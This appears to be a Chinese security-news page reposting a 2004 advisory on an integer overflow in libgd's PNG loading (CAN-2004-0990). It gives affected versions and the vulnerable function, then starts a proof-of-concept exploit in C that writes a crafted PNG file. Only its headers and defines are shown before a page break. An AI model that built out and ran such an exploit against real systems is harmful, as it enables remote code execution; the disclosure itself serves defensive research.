当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 安全公告（或线索）提供热线：51cto.editor@gma

libgd远程整数溢出漏洞

【相关文章:Check Point VPN-1/Fi】

【扩展阅读:GNU Radius SNMP字符串长度】

信息提供： 【扩展信息:Cyber-Cats Chitchat 】

安全公告（或线索）提供热线：51cto.editor@gmail.com

漏洞类别：

远程整数溢出漏洞

攻击类型：

远程攻击

发布日期：

2004-10-26

更新日期：

2004-10-27

受影响系统：

boutell.com gd library 2.0.28

安全系统：

无

漏洞报告人：

infamous41md

漏洞描述：

bugtraq  id: 11523

cve(can) id: can-2004-0990

gd是动态建立图象的图形库实现。

gd在处理装载png图象文件时分配内存函数存在整数溢出，远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。

问题存在与gd_png.c文件的gdimagecreatefrompngctx()函数中，此函数由gdimagecreatefrompng()调用，函数用于装载图象文件到gd数据结构，问题是当对图象分配内存时，由于对输入参数缺少充分检查，可导致整数溢出，精心构建png图象，诱使用户访问，可能以进程权限执行任意指令。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#include <stdio.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <fcntl.h>

#include <string.h>

#include <unistd.h>

#include <stdlib.h>

#include <stdint.h>

#include <zlib.h>

#define outfile "britnay_spares_pr0n.png"

#define bs 0x1000

#define align 0

#define die(x) do{ perror((x)); exit(exit_failure);}while(0)

/*

* a chunk looks like:

* [ 4 byte len ]   - just the length of data

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：